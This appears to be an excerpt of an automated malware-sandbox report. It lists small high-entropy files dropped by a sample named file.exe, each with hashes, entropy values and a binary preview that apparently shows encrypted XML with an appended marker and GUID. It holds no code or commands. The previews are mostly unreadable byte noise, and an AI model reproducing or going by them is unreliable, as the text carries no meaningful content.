          Preview:<?xmlI.......n......<w..[.i..=(p.C.>_m.Q.b.....K..Qf..;........c.#.<........qel..(.L!P....U.r.}.g....r...: ..cg1."....xd....j.j.&........F.;P...E.?.T.]K....A..>.F.........4.H..%>. i.W..S.O...EL..u.i5..NO6..4l2....Yp,.H..8J.E..X...2..}W...f..x....U.$........ad.).$/....+.....Mv.....s./.E.$.+?....<8..}W.&.G..B..S4..[,.........!.+.@..-.8...z,3XL..._......>_.i!.\... ....@.Y.KkL''...T...O.+.....?....J_E..ZMZ}5.^*...<!.3@.$)6g.......#.wg#..7..-...!.....0...M.v.q..d.r...7.'x.:9.X.lL9..].f.w.:M0...S..{.P.R}.e!...p.....t...>K,..f[:.........<..e....g...b...z...=[:.).=...^W.6..g..=......X.i.V...xF...h.l...*.....Y..y,...k...L..{Of.*..T...TB........t.^..h.N.....Q.DB..x......g..v.{b#......VNkSe....+fd1......\...Gb.Y.....e;...*....i..Nf.^.O....0(.S..`.Ph...T....5................F.F..J.6e..9r......we.Mi{ch1e.[..X.....`.F....Br6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):806
          Entropy (8bit):7.73282689844571
          Encrypted:false
          SSDEEP:24:QX7MTTZG2tLyplv/YrkDTODrT6E44fUiTkbD:CwveXv/wkETEmNiD
          MD5:6C95F5C9BBCD0FA8AA90CA94B0C31DD2
          SHA1:A3A07567F50168A0CE364144B0357A93861A01EC
          SHA-256:3ADC51B487CC04CDCF30298502211EFB8B436F72046AA5E877FDDCC90EECC8D6
          SHA-512:9D80297D169063674CDC379057754CF225EE4C58BB50A47910DD4F29CAA3586C8E4A9DEFF3E504AC2945FCA1F4B691E25490AD124D9C80349A39F6558937FF9E
          Malicious:false
          Preview:<?xml....hm.m...2.:...@j.9*A..p.N..'..o.w.....6.O%.......(g.5...P%a....;.<........[._p.....e...I..a_.hK.,.;|.t)m&......M#.X.W.%.[-..1..vm.k,...?..M..G..b.m..._...W.$....~.%.kH.J..s..:..Q....N.cLr.?.iX=x.1..a.G..g...n..b...q3...'E...|....#..\e..w.t....P.4N2.%..~...{...d.n.I...D......(...Wus..."..O1.4...\.Y.AU.3..).....M.e5`TL...u.$3....{.@.......k$.<.7uT(|..J..U..:V.b....(^....B......L.3......t.E.Y..Q-.1R;&.F.?.{.e.1..........^..O...0r..n..r.....Z.`..H.....rM.=....2.k.wO.5%'..\.w\.r....JT....4....B..6.......v.....d..-tP....../...k.......-jh..i..W.....'....5..:.Lk=j...I#.H..^.:PB. ..aa$.B.;uX..:..9n.r.8.....l.q.....d....c.........3..:.r...i.,.K).G'......s.'h.k$t.r.j.8.wxb.$...........4...4..jx.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1156
          Entropy (8bit):7.806644704391667
          Encrypted:false
          SSDEEP:24:bEQIc7B6y4xe84KdoyPkoSP1Ub18s6bP0a19nwrA7rlNiTkbD:ofRspwnS9UWsMx19ryiD
          MD5:D718F0FBB1B9D98EF7466B8793B22CD6
          SHA1:0C16EA8C3400C0BA2E8EE333EA047DFE2486C5E5
          SHA-256:9A0964B5510A1A23E6710EC31182829497FCEECC16324BF4D6025CAB88E21B06
          SHA-512:F6ED0193577BFD15620A1130CDD659FC93AA9ACA108CE7D911EB44F05B2E4FAAEEA959F0FE3F974B638995AA1EC227B55C0F062DF90DCBAA9EE48AF366C510E1
          Malicious:false
          Preview:<?xml..P.....P^s.S..(.Q.C.~......k-..~...>.R..Y.....yL. ......`\.KYM.....#.(._b.vS....~.l....OO..c..wL.."..0..O..4\...p..[2.x.....\.G.Sq....".I.:...n..X.Hh..^6._...Mn...W..d.yQ|...).21.o.....o.P./.:..5W....n........s;..../yO,V.3..<.%.(...y..........j..~...>.......y.m'....I..eh.La..'....%.G...[......\......'_...>Zr.4D.8,.]..B.....5.S.u.K......Ph.)....z.....)...nv.5...-5iR.p:..peY6...Z..._..K.$.....ti.......~U.Pw.'[.P.....EeY..h.Z.9.b.[..1.\N..+..c]..M3..Jtp6X..+.sTp....G...7j...k.{!.....iE.......!z.].....Q}SZ8%.'...`.{&GT..ZK.HF....G..3.....@p^..@.....t..;.T...F.G...}mZ..O...-......xH?..~]=1.......... ..6.yD..3...X....NT^.P}..0-../:<.1...`u..e.....-.)M*.X;...[..v...2u.aP........i.J...~..%.....K).1a.6.-.Z/.;QY..%...I...G.)..W21.6....#Z.@.96r.S..9..c..- ..U.lQrhk.......k.j4..Z.k..8...v|...h$.?N.....QCn.,.........26..^._.,M^a...........Q...L.p..Z4e....d/.n.".~..o.v.<.l0.V...N....:b...y/w.n.4m....+TjF#.+'.......\..... S..nX..%%..:6>.}M..LdT.;
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):927
          Entropy (8bit):7.777776933784207
          Encrypted:false
          SSDEEP:24:Dpslkb6/xaZt2ppdu+fnGwgWObHX7X0nktZiTkbD:Dps2b6ZhQensW6HbSpiD
          MD5:C608A4D2E6E9E307BC4A6F15C29BB10D
          SHA1:D4CD9E168D55F04D9AB527C6EBA224D5C305AFE5
          SHA-256:8B1D7796AB363A3E954FD45192D4BE3462D7DC0CED5D93CC38FA585C3716CF9C
          SHA-512:3C0A85FF8C0E65840F18C89A0063E503944AF19477C2103F1D094B0B0872FD736DF295BC8877FD5E2B902849AAB0451D330677B174D5E4C0D1CE85202C90FF11
          Malicious:false
          Preview:<?xml.O...0\'..._..m....m....zW(R.m.Q\.K.. Ju...8..k......$2.e.[i&..&....F7..w{....5O.Pr..L.......4.|3.G...L......%.G...UT...jG........T.;...W".W....1AlhG..<W+.w.*....CC.:H.k5....n.yu..SU.....\.;..O._.K8.]a...c..c.*.......=...t-.q.!..+g.*.G..t_O.3...<..y".d...Wd..&=./...H.>.......R...I7e....}._74!........4:..ly_b..V..v... ~...[5......(..h........u..G......)(}...<.P..e;.wo$....<...9<+]R..]K5. ........<.K.1%.....2..0[...1(.^q.....g...F.AW..Vje.5.I..J.....AO........./#..kF....E3..T.T...i...^....oqU...M.[u.D....zUy.....x|5.fv....V..*u...G..1~..d~.+.L....h.I8........%.^...2=V..k....(...o+GI6*.f.4N.........U..;..5.......(o..{Z1?.....#4......I..d.~.FP...D..HW.Z....I..9.......C.......0z.wz...j..k...BFw..e....=.;3.Y...O...Ba\5.D..p......E.B.b..6../..!.JG.:...g`ce......K...gF..x...q..u.y8^..f.~Z..b/..{+..1q.E../r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):717
          Entropy (8bit):7.700826033395133
          Encrypted:false
          SSDEEP:12:Mc9WqsGPkEnwu2YaF1ePtx5yGbZHtO3NS/d93tzM5OBoCrQ4MzzMZVlPGPonixpW:j9sekzu25cy6NUNYt9MspAqVl+PoniTW
          MD5:FC4660FB7F747FEF612D719004B6E418
          SHA1:B0E8F3D549DBA90DD0989E27CC58F595A5EB70CA
          SHA-256:C2834EDCF4A5B1E34E2B2675C6F4EA5EF5CCD906D277084529FF717F797D38C0
          SHA-512:90A7FF8792458AF843493FEB07924E0855D4C7376381E09D884361CF9639E17F17ADAA3119AAA324E8C9B04BC4F4539409564BB4D52681EACBF0CFAFF392AAAD
          Malicious:false
          Preview:<?xml1.Y.r.fk.\..u..6..d._..b....m.gH.3dN......x..........9k...rK0F}.F.S....js....w-......]..........7....N.d...&..?1.Vd.Z.$c....+DH....+>.....n$..x....=..M..].u...J........x B.F.8...pn....N.d........ ..V].v.Xw..XaZ.m.....8..Q....iE1=....L..M8...1....V..A...e.f..s..>........u............O...5... ...........8".....|'C1...E).....i...b.^.S3...;@...wb.n......X.P...*.dU...O).......Lx.....Q........X.QMY#YL%..i.-...&n6G..".#.?.z..5l4...;..Q7...i^.O.!.H.e......<Y.>..6.CX.<.@...yra.e.,h...o)._g..J..~...]..(..+hZ.d.:.P......Sq`z....h......i.......;Lh8.t.$.(."..4!...@.0..h..xR.U......V4...5(. n........e2..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):942
          Entropy (8bit):7.757177155219507
          Encrypted:false
          SSDEEP:24:kN3Xf+2R5qR10PnvH1MWUrijTr2OaEqdrqa7y1DWAd/iTkbD:kEQERKdM1riPgEBa7EDWAsiD
          MD5:8F97CC23485CFE8B2F57ABC0E97FC694
          SHA1:FFA1B8C5BA949268C609F70CBC5EBF6B97BF1DFB
          SHA-256:98DFC9B704F9FE897A1E0A1F9B506854B699F5DC13776AF9BBF03B0AFE5D23F2
          SHA-512:2A1EC37C5E7B1D72945035FE75965DD30CF4C6052D75EDC02C87B8934146402B33479546F2D25D32EFDE8A83FB18B8F0AC006142890D97B7713E7A0DE466436D
          Malicious:false
          Preview:<?xml....D...Vi....s..^.z;.-.Z.rCT...~y..cF..|....B|.t>Fs...5D(...;*.*.1..H.&*.=.x.'}U.y^.p.e..b14....<.W..tb..../.....x<k...D.<a.....b*..6Y.....DuXB.l........:..].g"4._.LU....s._U;.(....j......<E+......]Z<.~V.T.l<Jc...B..eQ$...-)..0....OY..D...i...<W....\..{.~.=..T..?c'J.M.Y....rD.>....).].B..m)..9.p..e.6"b.e.s..m....m8X.g....sAn..o;.j....1.....@x....F.F5.4..S.X&..%0V.y.qf.]..z`.?g..U...:&.."..]..=~.u..'......Hq.....VH.$..]....@...3I..m......r...LZ}. d......I..X.2.0.N.!.....}....T6.....t.U.h(..A..&....>_4./....0I.J:i. .P..A..?Y.....C..c........0=<..`m....<)L_..A[M..<Z.(\J...........<3..=G.4.FF.o.7...-..@.%...D.R@..n.10.`.l..b......2.i.E/..j[..ZAU..P..$d.=....d.f...!.....aj?..+nkx.......:..f(...+>-.+....R.P.O..b..I.n*X.6../..l.Jd..A..).c..Y.A.Fu......V%|.F9(5.t..9f.I]..{.|R.>.%n..u..j_..rTT......)%.'...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):949
          Entropy (8bit):7.784678163698125
          Encrypted:false
          SSDEEP:24:LZ0t5LM1RmbLrLdbw6KuBaOdMwIDX+PdWViTkbD:e7M1Abhc6KuBTwOPdBiD
          MD5:F1F283AF4FA82B4E287D463A7AD3B28E
          SHA1:75F686BC173AAA5AE9E30D8297A110C8C7492BBE
          SHA-256:D955748E1FD0846FC4899C49AA7B089A322886FEFB9A7DD7A30EF8D19A7E5DFC
          SHA-512:E624247B3510D3160CFEEE0FB910AC2951194097C35830DD8AD1F88299EFF73ACDD5A127F5AF906EFB4100151563BFA70EF38FE814E90DD2C7C2AFB5F2FDB5DE
          Malicious:false
          Preview:<?xml+..(..8U-N,..+..F4...~.x?...=s.G...J....J|.....Pp$.H.)j......X.*q..J.>m2..f.zz.....~.j....j........Mg|....GqO..M.#.E..U.EW[GQDo.W._z.]1.X...9c<...B..?.....J..|s..E....o....o.]....2..*..j....o<.D.L.W..M.....#.w..4e.T.O.~`.$.W.(..La......A..L...t.......|.......H...X.QL/..c3i..Zh..&."a.......j..7n.8i,MB..x...`.#........-z.....$B.7a...u&te.......<.n.r8..+....@".E.g..+Pp.TU..z..l.pk.@...Za...%..$x.f..4&P...`.6#O7..75...z....6_I.V...c^.........S.2.9...!.........'.....C_>Z.._.c.l..q...W.x...c.>.y../7C.w....^uve.o.X..m&..%...[.B..H.../............Kr..z.A......BD.i.y...ZV?....z.ub......w4U....j..1.....c.z)..MhY..S.0....$......|.V..l}.......>..L#....C...(m;:....X.cU. B..\.........$.hr'..].j..0y..........p..h.<ZD...I..\..p.h...z.Lkkdan..P:..v...M.-.W..>..4`.p.1.x.H.....$..&Z;B.....\&.Mq..i....P.q...b-...6.^.O.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):867
          Entropy (8bit):7.745906033242854
          Encrypted:false
          SSDEEP:24:CmVg93T2o/FewH6390HmQyAwd9mRYNOXRViTkbD:Rg93T2ojH6XIwWGyRsiD
          MD5:A30BABEEFAE68A4B7A1AB9D146C4016A
          SHA1:723246A0963157680F1E95DA140B4FB9CB28F42E
          SHA-256:3D284A9446C5511AB8A74CE66AA8362694D95F6A86C0024C5C47EBA2C98F94F5
          SHA-512:16B70EEE4BC6E172EC56139FAE5DB8B7C5324F9689DB2468FC2A8C589D4E118E4B8B1D5CBFFC346BE0F3080D48C20E7A43854317AC66441B0F45AF5648AD64BE
          Malicious:false
          Preview:<?xml......[.P.S1.GKA\,..W(.}...y..@..RTe}.8;{O.C..2....`...'4... ~`y3.H0..X*.3.}bh.C8ej.`..C\%..RJ.d...D.=O..FE.d.=.}C^F.8&.L..5..qh?wR....d.Y..q.....W......A...'..K..)....;.....Bv!w.Jk._.6V.2.s..,..)G.1.-OwKl.3.<.E}I)...$]gj.I.d. Ey.......9..sg.x.......K.{..f_.,.b.nf.F.\|\.o..S...W._b{|z)R......W..3...Il..S.<...9.:}Op.X.....\ C.,.}.Q%_.0.{:+.v3Ce..`9....a....E.f.>..Z9..y..Z..qa..}...4T4....&?l....P.E=.......V...[".DM...J...Ti..d..B...^..3..W...F..Gn..1.e1I.x.(.i...VF!`.|....Q....yO.....'.qt...%i...........;.^d.6..3S......".r...%...#....../.X.....FJ.......d...[&......G.\.$.....^..%.i.]...(.o;.....Ta...n.b......t.O.A..].h2X..,.e..w5...)iR.d..q..,.#..J...X...BJ..n....Ps............-..(.H.....8._>:...+....c.?.....*.........t1F.1.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):918
          Entropy (8bit):7.791925553153304
          Encrypted:false
          SSDEEP:24:0fWP8gXAD2ePU0YpaMXqfbw6fbK/Oa1t+yf0LfziTkbD:0fW9AyEU0Ypa8Z6zK2Q+LLOiD
          MD5:630B28EB710591495DF5607DA25719F1
          SHA1:6162F6F3D97096849C5E2D060C9C3A431B8A2391
          SHA-256:2FB08287A42279B2F3758DC834D22781C3B694EA67DEA836EFB9BCC827DB99FB
          SHA-512:40A17CBCF8A0AA4616EE5464C82FA8177D53607096D98764D33B02DC62AAE16E1F10EF1130D4F3A2710ACE18FC4F5B7F498139EB041BAD85BBBF9203405E03EE
          Malicious:false
          Preview:<?xml.r....|.J.Pm..3Xs.8..; ..`E.v..L\. ....a..._.a...+'...7.:X...A.....2#d.v.5E#..S..v$u...G.K8Q...YJ=.*...B ...."-Lc.[..YE.....+v<H.`w.Siz/..f.AHzg@...e...lJ.....~...p(.._...j.../Wk..F.vR.."......,.*G...M....ps.V.d........^..Mmy.....TzM1.(.g.f*..i.F..$"..!......w...y...."..KM.....6{5.t..E....c})O\[l3.PJ......&....N..:j..k...U..T..(.J..L.v..Q.R4...`u...7a.8....E..*.>Ge<0.....k.R...q5.q....w$=..`...).g.E.q...2-...3..1Z4..ugk.WN.......io........{%.S.u.iq...0#..uz...Ql..6uE.....B.P.n..2.?.s%t.&.............k....:.......W.D[.l...+.......q...o..}.u6.........r.8..s'..H.8...}.X?..jT.O.....9Z.l..aZgg..A6^!.....#.zP^....~...=WLQ....P.[ ..-.....D<.=.;.0.%....(.....`..B...|p..j.@.9...H.i..M.I..p.+..joG.p`D....:....R..."...w.fM.._9...|tB#l..?p....Z:.)|.q.$.bHHx".....KeG...Jf........A...br6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):898
          Entropy (8bit):7.737626367805869
          Encrypted:false
          SSDEEP:12:Rw8NhmcdfCTdDXeMoZMtrx9EmNgOeIIqf9B39+GUZ6LqRixpZacii9a:JNhrdKTpVXrx9EYb9BtZUuqRiTkbD
          MD5:FECAAAFF3661FAEBDE973C8ED3BD2C70
          SHA1:C82B1C1750957E8687D1674E04E93919E9C8289B
          SHA-256:5F23C5EF058A43C7068F131756C3406C08FCD779972DE775D326B6F50619F0EE
          SHA-512:3C83CE16FC5376B19B19DF418210C819B70A56509B3C8F252E132DAB39BFD8B210B8625AAFB462DF4650146CE489FB1775EAED7B345DD4491A92E17A383686A1
          Malicious:false
          Preview:<?xml..Z.zs..o.'..\.2T.1.\j...p...6.....TI3...o3m...9......&..e@.n..L..}V.W...........a...x4.1.....t..x.\..J...e2..#...@..~...=l.]....\]...G..N.qb.....WN#&....9..U8.......^.X+....X.7.0G$j..F^.<.>,q..j.j...R....6.3ap:h.x..1...-.v=t..).......g..Q..N.i.5g...8rE...cS.c...?G+l..X.......-.d.. ..|...Aw*.....Mp..Y.W.=lZ.E...3....$leb.B.........D'nW._...A...m(..U.4..K.R.o..y..-..3.".X.%>..4Ju.mB.......Xh..q.%/.`/....w.....[.%..,Am..C8..X.b.nq.....%.....[..@.z.A.B......hX./..u..<o....[.-........B.......;.~......W..g..9.o.X..2..M...>.hp~.U.|M.....y.d$...xMl>..;...Tl....Hl....;.. ..A.6.N..xR...S(.4A..yY..%k.../.e<..x....76...w.}3Q)..)...oPq._...G.D...4...#..$.k.X...L..}.d.6C....R6.....v;.vC.aG,...g.....q>..o}...X....]..n[......._HY-.6"D.L....G.....]t}..q......E.=.pa......'.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):798
          Entropy (8bit):7.720629588438374
          Encrypted:false
          SSDEEP:24:3Ko+In03q5KHDs9A+MWxHCzQAxB9iTkbD:6d36KHDsPbYOiD
          MD5:318736BBCC9B75C59E936A93475E3E1E
          SHA1:D2CC7531F23D7C01959944D022461022EB39377C
          SHA-256:823B39167D8E143E57BC939DF22D0EE1539D14E164C20C7EFBE6F48DB65D003A
          SHA-512:47DB30D10DBA3EBF6EAECF83C35AD80E71F06BB8BBE582D94308455BAD2F6C7EEDE9CD4F03C7FD2701DD846641418E912B81E3ADBA22AEBD69584083D9F22995
          Malicious:false
          Preview:<?xml..c].... .X..Y..g.(.B.....0~........i....WO. .....Gh/[.7.).*..t0..&...2#t.Pw.<.m..IM....-.....Xl.......R.}.ul.gA.lnX.Myw.;a$_....zy.....Hy....~)..Z.'E..;.@e1...eV...Q.De.....:iL.....?.C.fA..*8.|xC.5..x\t...o.O.....y...X.v.o..9s...|>o..r...e...T...?.W....n..E.n..E..l..6..G... .......t.'.U.~.K.`[.-fL.#Gn...y*.}P...k.t.E.e9}..........p...5.Yl..;...(-.o2...l....B%E...5../.}&O.ia!A....<.d......O@...k.0........U.rM...X..%.s.....S.w..:T2.2ZN/.2..........2...Y...q...Y.iG.....Z.....e...(?$wf8..f....x..@......Q...v.^."...|&......k.i|Re...n...^.........7...g_.9.3#..._.Gbx.e.G.x......f7.z.....+.@..L....(..YD.m...V.$.......xg.....\..*.%.MS.e.e...=@....5.s..N!..N.Kd.l.l5I]..KF'/@..c...+.=....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):788
          Entropy (8bit):7.658335309249914
          Encrypted:false
          SSDEEP:24:OIT4um/fnBobJp21IPP0gnxgCRsGDB+0w7Qd0iTkbD:AHBoKu8gnmCRsGO7QdtiD
          MD5:15B7846933D41F5E08A652B69BC36253
          SHA1:3124FFE78C160A67981F1D4D74DB0EF627C36454
          SHA-256:1A1DF58B796E35D961F6CC7265BA276C95E760857CD189F993860003BD011B07
          SHA-512:58EC5B242B28613C44A492D9BBC69EB4C5C30E281B92B0ACC4F53E9BCA7A5D4E5AB34314882292BC30EF53DC819BE43BE713BF7F0A2401C71F149187E2C48B16
          Malicious:false
          Preview:<?xml(.O}.....I...Y...9/.....u..&24'.GE.M*.........f...>L...v.*.e#I..r..a..y....E..\...Q.lI..YK...N.`r.H.rZ@.Ou8,.(F.s.C.K.h...T...GH...l......=.(..y.J.N..pg..f_X.{v.0.}IH.MR.2.../......kWw!`...Hi.|.0......$....l.CP.'1.. ..S..?&.?.a+cw.U[|.BH..v.}...=:y...9Fy<..S.I..".....0.xU'.....C.pI!@.*>....7Q....f./..../@t.I_..)g...b..0.q....FT..u{.-...;..Ri........2.P.{.Vyv....d.....B.i...u.8U.o....#.E.s..6..._Y.........ev..6..'...zyM~c_sK.$._v....(...A.pW7Z..=..E.'VHx.A....8d.}zFYE..R.)?N.e}a?g.A4.h...;mb.\j...Zp...h.d}..9..+.1..K..=.;9F..b2.....0*...'........$.:E.=.A+.C#..8....g.Wk@8.a.a.<....s....CSvml......b~..*..zgl^.S..a.5.....'..PA....6.7.....9..X6@........).l..h.4.~r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):987
          Entropy (8bit):7.777032278170058
          Encrypted:false
          SSDEEP:24:C6/3l09RoUXj2FpOtTDw+t2BV4DyF0ttcQYiViTkbD:C6909RotFpn+t2Sz8QuiD
          MD5:4B9869CB0AA6736C6933D01F2266EAA7
          SHA1:025C6698D92932ADEFEBCF8629FC05F53769B7EA
          SHA-256:FAE39A91738F5C2FE6BF00E8C43B35D309C4945097815DEDBE82C51A8134A266
          SHA-512:1A2BB24AF57B92290BF4FDCA729287781DA2D1FAF51F7FB57D12261D88C5284C16D4A250CC2B9465E48137EEFF48BDBDD15F40C1068F4EF30E879D58826CDB52
          Malicious:false
          Preview:<?xml.|3...A6j...<..~N`...D..y=>...m....../..-.....s L..Vk..f.........[..L.7_gz..N....mG=..H.(\...1......1.v|...5..lO.F....N..nH.?L.R..j2.^.......Q....H.^.(..h.s..w..r..(..`...#.['..m..<../#4|..e.^=K..._5..L.... .&o..........Z......w..@+..... .A."p..F......a.#\9s=xM.[\.|>.1o..jG...X.T...R,..$...X}....j!...g.V.>....h=L`....{......p..X...)bF....k.X...u.42.}.-.a..k.".%.!..I.Ev6....vi:u.[CD.e5-Zf......]...Z..{...U..S...B*..!...^..0!.B.}..J.._.....m.j..Z[......<:A`q..Lz..X..%)...Q......^..'!;T.KB..c.Z..sX!..v.^...p>.fF..3QD.{...F0..,.q....|....O.C5..;.......>C.....76N.........R..En....p.Em[|.v..Y....}g6..6..v>.h.0..2.@ ...."..y...u.>......_`.....x/a{.:..Tx.........."\...KM..R.|..S.fT>C.X...........%.2...w.Po..X...r..\>H..<....;.<..}m.d......p.wb...(....v.].......BZE.....h...&m.......j.z}h.+..1.<.b.t.@.HUyj..:....L.......%......P..Va....l....Io...f..]g..k..-..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):996
          Entropy (8bit):7.783020294451482
          Encrypted:false
          SSDEEP:24:MXRZUDQABS0UmJZ/VPEISutdlUduTjmxpIM71iTkbD:MXYNS0hlPMu3lKLp4iD
          MD5:02DAD4280D0374B1DA6A9F6F834237F1
          SHA1:BC0C37434EC6D08070B4A9ABE3A3131BA02C243D
          SHA-256:4D093D39C4ACB8DD7EA4B11AA48D469571A936FBDD9D43E3EEF0B7E327CCE329
          SHA-512:A961DF8A6AAD0B56EBEEE70E3072F619B13B9697AB371E7FA2C927B2F64F87622668554DEB96CF71A04210ADCEB7A0A6B70F5EDDCA569E8C65E0A941FFC83ECA
          Malicious:false
          Preview:<?xml.....m..D7"n.T.P.;..Rz.k..k./.........:..I..A\.O".6.......&....<.`.n...\..{*..gc....9.z:.......ZC..^.......Cv.....-~...WgO.dV..e....D....=...............u...T...U..rm..G.W.. .;.lM.[C...!...".8....Q`..^....:&..q....h...m.e.n..o.....7.I..........w$.5.....)..$.3.h....>.....<\@@.W.....6S...2...^.......>us\...uS..q.q"..f.Q.k.f..1J.?.1..CV..s.w......z2..v.%..T1e...z..?..yA.Z,..Q^q.......;...@O..Pzb...X.g})..W.1..._.0oI...{f...U.2..Lc...V....x.8...:=.)7ZO.&.A....'...X:s;hJ\..e/.E...i7..;q.k..!9..0._d5....X0...Xf..Uc...+G...?V......9..........}f......0../........HS..l.a.t...w.v..%.Ftj..jp.t.= ..>......EPl.....)|e...T.x....<j.B.g.S..nX..1xq...a...-yM.....O..JFX.Z..$P..S.i..c...a....P...y..:.$..%.|..~..y....g.5....2.!...{~r.....j...V.J,..-}.)...acZ.3.mP:.oi_9$.A.....,/T..YA...!..x.Y.(P^.9k.s){...Z..j....A...+/..?....cL"..B....Y.$df..8c?6.JV.0.|!.....BBr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):893
          Entropy (8bit):7.740689067507618
          Encrypted:false
          SSDEEP:24:7YexHBwUmkX2oS4XgJrwymTRHEEiS73sfwFF+tlFiTkbD:7YexHGUmkXgpJ0ym5E5kgwFF+tl8iD
          MD5:CDD8F16FDFA88B9A60CF69B782B84AF6
          SHA1:323B5D137F34343716218CCD6EE12E8A3674E2AE
          SHA-256:92B0E24E0217D064035DEA659D9EFF505FD667364F1473A49C97CBD5F00C2BA5
          SHA-512:0A6F34885B3AC3740487E1FC5F58B3D72533A6C939912E9E513C0A0B554035BDEE79FBD5A8F9F179DBC2170CCC56359E1787B7E2477EE0C1002BE9F5B02BD21A
          Malicious:false
          Preview:<?xmlH. <.H.\.....Q|..).,.._CC.Fy.r..e......h>A......:..o.8Vr...4..F..0..P. ..*<xYA.....<.1..;......*..C..w.......n).. .....z.....9.jTf.2.#.z.'7...%L....),...1.....2....9..-.g..C......Z.....O.3..8c-....8....'...5.H.hw.G ....b....+9...7...w.cL..3.m........4...=....?..%.,.. .-..P...*.....X...,./....T=..... ....Nj.s.M.q.x..@...<8.....]).UO?.G.F|t.i/....3..{..L{.!...#kz......H.f........4G....7...k.Le.^x..y._.....Z.....S..(.4.%..uVnq.T.....6_K.y$.2..X..@.A....E...wa..../=s..5...(....4..Beg,...t;.A..)..k..|...t.>H\^.e..w....K.H...a..C.~.....'F.n..dk@..9...mq....T.Y..#.3!..Y..m../.L..RQ7.......K..^,.,OSK....,T....4.....g.....& ...?.H<^$........Dw.}..0..V....]5YL...w.M..7.G.`.....=.s...<.5_.=...@...kj.H..0 .uKd.@.:.......u..J%..d...a5}..o....#.~.a}.....k.$.8.&......z.Kr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):799
          Entropy (8bit):7.700099568609002
          Encrypted:false
          SSDEEP:24:nxxu6GAe4TQd+CMlNiPrY5XbWG/CahviTkbD:xxMbMDNlNiPrYQPahqiD
          MD5:86CBE7E4812ABF1CD98DD10B6EDD7136
          SHA1:A61671E142E56DA791AD0561CF4B413DFA3FCE5B
          SHA-256:0F35136C4EB38B1272BC7BDEBBE711C2F905EB48C067C0ED45FEBA371387D710
          SHA-512:2B48BB661D2D8991C07AFECFFF69E3297C853B52BD2900E3D14F91C79FD07DA04B5DD7D7256BAF7FA7BB4EA4C04D6EEFA345CDFBC54CDB363D1FE6412DB6479E
          Malicious:false
          Preview:<?xml....v..|.........c....1.0..c..P.. O(wS"....[Z..ZX.z.+.7..."%...2..n^/.}'.v...k...d..\.).....x..........J?.v...&./9h.sw.c...%...@.YcX..5...h.I&.........a{.&^....8..\.Qu.!.F.I\C....W.*=|..d.{.!S......Z..%...9.z../....:....N.ua).:!K..3^|.....@).6G.7..a.t...A...,+C..#.4Z&....1<.u....@.O..8.6.(I....nc...]D....zj...fEyt..Ubd.l^5.l~W..Lu....r..Q..Ni........A.@._9n{pi...z...%.P.......=..#t.u".k~.........(...7T.Y6e.=4...*..96.ou.......{. X..,7...A?.(Z@R....1........?K.;.+I}OV..AW<....lF.N|..O.0lRXV]..x...w.>..).5[.M.8..{...,S<..2HdQl%ID.c......."L..L....4@sY...>:l^T.>..nw....R...L.u..YJ...Qjo1.....0...........,...E.r........L$..........P.#.9..Y..;......w...|k@...T.A..`.^....JPr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.762882867702622
          Encrypted:false
          SSDEEP:24:b3fI/rOsyYI7neI03GLquYTHEEb0SiTkbD:rIzOsyY+nN0WgLAiD
